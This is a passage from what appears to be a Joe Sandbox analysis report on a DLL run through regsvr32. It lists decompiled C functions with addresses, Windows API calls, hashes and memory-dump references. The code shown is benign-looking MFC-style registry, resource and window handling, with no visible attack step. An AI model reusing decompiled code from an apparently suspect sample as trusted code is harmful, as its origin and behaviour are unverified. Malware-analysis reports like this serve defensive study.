                                                                                                            • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                                                            • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034B35 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10034B35(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x1004b390; // 0x1003d660
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x1004b390;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x1004b358
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}














                                                                                                            0x10034b3f
                                                                                                            0x10034b45
                                                                                                            0x10034b4b
                                                                                                            0x10034b4e
                                                                                                            0x10034b51
                                                                                                            0x10034b54
                                                                                                            0x10034b5b
                                                                                                            0x10034b5e
                                                                                                            0x10034b63
                                                                                                            0x10034bf1
                                                                                                            0x10034bf2
                                                                                                            0x10034bfe
                                                                                                            0x10034bfe
                                                                                                            0x10034b6a
                                                                                                            0x10034b80
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b82
                                                                                                            0x10034b82
                                                                                                            0x10034bd3
                                                                                                            0x10034bd3
                                                                                                            0x10034bd7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034ba0
                                                                                                            0x10034bab
                                                                                                            0x10034bae
                                                                                                            0x10034bae
                                                                                                            0x10034bb1
                                                                                                            0x10034bbd
                                                                                                            0x10034bb3
                                                                                                            0x10034bb3
                                                                                                            0x10034bb3
                                                                                                            0x10034bb1
                                                                                                            0x10034bc3
                                                                                                            0x10034bc6
                                                                                                            0x10034bcd
                                                                                                            0x10034bd0
                                                                                                            0x10034bd0
                                                                                                            0x10034bd9
                                                                                                            0x10034bdc
                                                                                                            0x10034be2
                                                                                                            0x10034be7
                                                                                                            0x10034be7
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$OpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1607946009-0
                                                                                                            • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                                                            • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D0B9 Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D03C( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000C8E6( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}










                                                                                                            0x1000d0bd
                                                                                                            0x1000d0c2
                                                                                                            0x1000d15d
                                                                                                            0x1000d15d
                                                                                                            0x1000d0c9
                                                                                                            0x1000d0cf
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e6
                                                                                                            0x1000d137
                                                                                                            0x1000d13d
                                                                                                            0x1000d13d
                                                                                                            0x1000d140
                                                                                                            0x1000d143
                                                                                                            0x1000d154
                                                                                                            0x1000d154
                                                                                                            0x00000000
                                                                                                            0x1000d15a
                                                                                                            0x1000d0e8
                                                                                                            0x1000d0e8
                                                                                                            0x1000d0e9
                                                                                                            0x1000d127
                                                                                                            0x1000d127
                                                                                                            0x1000d129
                                                                                                            0x1000d12b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d130
                                                                                                            0x00000000
                                                                                                            0x1000d130
                                                                                                            0x1000d0eb
                                                                                                            0x1000d0eb
                                                                                                            0x1000d0ee
                                                                                                            0x1000d11f
                                                                                                            0x00000000
                                                                                                            0x1000d11f
                                                                                                            0x1000d0f0
                                                                                                            0x1000d0f0
                                                                                                            0x1000d0f1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0f3
                                                                                                            0x1000d0f3
                                                                                                            0x1000d0f6
                                                                                                            0x1000d0fe
                                                                                                            0x1000d103
                                                                                                            0x1000d106
                                                                                                            0x1000d108
                                                                                                            0x1000d111
                                                                                                            0x1000d111
                                                                                                            0x1000d117
                                                                                                            0x1000d117
                                                                                                            0x00000000
                                                                                                            0x1000d0f6
                                                                                                            0x1000d0d1
                                                                                                            0x1000d0d5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0d8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                            • String ID:
                                                                                                            • API String ID: 3253174383-0
                                                                                                            • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                                                            • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C037 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E1000C037(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E10011BF0(0x1003aec3, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x10040668;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E1002934F();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E1000B505( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1003eb6c;
				E100293B4(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}








                                                                                                            0x1000c03c
                                                                                                            0x1000c048
                                                                                                            0x1000c04b
                                                                                                            0x1000c055
                                                                                                            0x1000c058
                                                                                                            0x1000c05b
                                                                                                            0x1000c06c
                                                                                                            0x1000c074
                                                                                                            0x1000c07d
                                                                                                            0x1000c092
                                                                                                            0x1000c0a0
                                                                                                            0x1000c0a8
                                                                                                            0x1000c0ab
                                                                                                            0x1000c0c1
                                                                                                            0x1000c0c2
                                                                                                            0x1000c0c7
                                                                                                            0x1000c0ad
                                                                                                            0x1000c0b4
                                                                                                            0x1000c0b4
                                                                                                            0x1000c05d
                                                                                                            0x1000c067
                                                                                                            0x1000c067
                                                                                                            0x1000c0ca
                                                                                                            0x1000c0d1
                                                                                                            0x1000c0d8
                                                                                                            0x1000c0e4
                                                                                                            0x1000c0ec

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EqualH_prologIntersect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227276553-0
                                                                                                            • Opcode ID: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction ID: 4a10622ef6c9ad6aa885a1ca4e3b79ad8472db7afe28fedb0a7e7fe58967940e
                                                                                                            • Opcode Fuzzy Hash: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction Fuzzy Hash: 19210B7290025DEFDB11DFA4C984D9EBBB8FF08291B11466AF906E7250D731AE11CF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100306DB Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t35;
				int _t39;
				void* _t49;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t39, _t21);
				OffsetRect(_t49 + 0x48, _t39, _v8);
				OffsetRect(_t49 + 0x38, _t39, _v8);
				OffsetRect(_t49 + 0x58, _t39, _v8);
				_t51 =  *((intOrPtr*)(_t49 + 0x80));
				 *((intOrPtr*)(_t49 + 4)) = _a4;
				 *((intOrPtr*)(_t49 + 8)) = _a8;
				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
					_t35 = E100301DC();
				} else {
					_t35 = 0;
				}
				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
				return E10030582(_t49, _t51, 0);
			}








                                                                                                            0x100306de
                                                                                                            0x100306df
                                                                                                            0x100306e5
                                                                                                            0x100306ed
                                                                                                            0x100306f9
                                                                                                            0x100306fc
                                                                                                            0x10030704
                                                                                                            0x1003070f
                                                                                                            0x1003071a
                                                                                                            0x10030725
                                                                                                            0x10030727
                                                                                                            0x10030731
                                                                                                            0x10030737
                                                                                                            0x1003073a
                                                                                                            0x10030742
                                                                                                            0x1003073c
                                                                                                            0x1003073c
                                                                                                            0x1003073c
                                                                                                            0x1003074b
                                                                                                            0x10030757

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OffsetRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 177026234-0
                                                                                                            • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                                                            • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001EFFC Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001EFFC(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E100373B5() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}











                                                                                                            0x1001efff
                                                                                                            0x1001f003
                                                                                                            0x1001f00c
                                                                                                            0x1001f00f
                                                                                                            0x1001f012
                                                                                                            0x1001f019
                                                                                                            0x1001f030
                                                                                                            0x1001f030
                                                                                                            0x1001f037
                                                                                                            0x1001f042
                                                                                                            0x1001f042
                                                                                                            0x1001f046
                                                                                                            0x1001f049
                                                                                                            0x1001f051
                                                                                                            0x1001f053
                                                                                                            0x1001f062
                                                                                                            0x1001f066
                                                                                                            0x1001f055
                                                                                                            0x1001f055
                                                                                                            0x1001f058
                                                                                                            0x1001f05c
                                                                                                            0x1001f05c
                                                                                                            0x1001f06f
                                                                                                            0x1001f07b
                                                                                                            0x1001f07b
                                                                                                            0x1001f06f
                                                                                                            0x1001f081
                                                                                                            0x1001f086
                                                                                                            0x1001f086
                                                                                                            0x1001f092

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                                                            • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D8A6 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t20 = GetParent(_t24);
					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t21 = E10029C98(_t24, _v12.x, _v12.y);
						if(_t21 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t21);
							_t9 = _t21;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t20;
					}
				}
				return _t9;
			}











                                                                                                            0x1001d8ab
                                                                                                            0x1001d8b1
                                                                                                            0x1001d8b4
                                                                                                            0x1001d8b7
                                                                                                            0x1001d8ba
                                                                                                            0x1001d8bd
                                                                                                            0x1001d8c3
                                                                                                            0x1001d8c7
                                                                                                            0x1001d8d1
                                                                                                            0x1001d8d5
                                                                                                            0x1001d8ec
                                                                                                            0x1001d8fe
                                                                                                            0x1001d902
                                                                                                            0x1001d911
                                                                                                            0x1001d911
                                                                                                            0x1001d904
                                                                                                            0x1001d905
                                                                                                            0x1001d90d
                                                                                                            0x1001d90f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d90f
                                                                                                            0x1001d8e3
                                                                                                            0x1001d8e3
                                                                                                            0x1001d8e3
                                                                                                            0x1001d913
                                                                                                            0x1001d916

                                                                                                            APIs
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                                                            • GetParent.USER32(00000000), ref: 1001D8CB
                                                                                                            • ScreenToClient.USER32 ref: 1001D8EC
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2204725058-0
                                                                                                            • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                                                            • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022B16 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10022115();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E1002283F();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}







                                                                                                            0x10022b24
                                                                                                            0x10022b87
                                                                                                            0x10022b87
                                                                                                            0x10022b8b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022b2c
                                                                                                            0x10022b56
                                                                                                            0x10022b2e
                                                                                                            0x10022b2e
                                                                                                            0x10022b2f
                                                                                                            0x10022b36
                                                                                                            0x10022b38
                                                                                                            0x10022b3b
                                                                                                            0x10022b3e
                                                                                                            0x10022b41
                                                                                                            0x10022b44
                                                                                                            0x10022b45
                                                                                                            0x10022b45
                                                                                                            0x10022b36
                                                                                                            0x10022b60
                                                                                                            0x10022b79
                                                                                                            0x10022b79
                                                                                                            0x10022b81
                                                                                                            0x10022b81
                                                                                                            0x10022b90

                                                                                                            APIs
                                                                                                            • GetTopWindow.USER32(?), ref: 10022B24
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 2353593579-0
                                                                                                            • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                                                            • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                                                            • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022422 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t13;
				struct HWND__* _t15;
				struct HWND__* _t16;
				void* _t17;

				_t13 = __ecx;
				_t15 = GetDlgItem(_a4, _a8);
				if(_t15 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
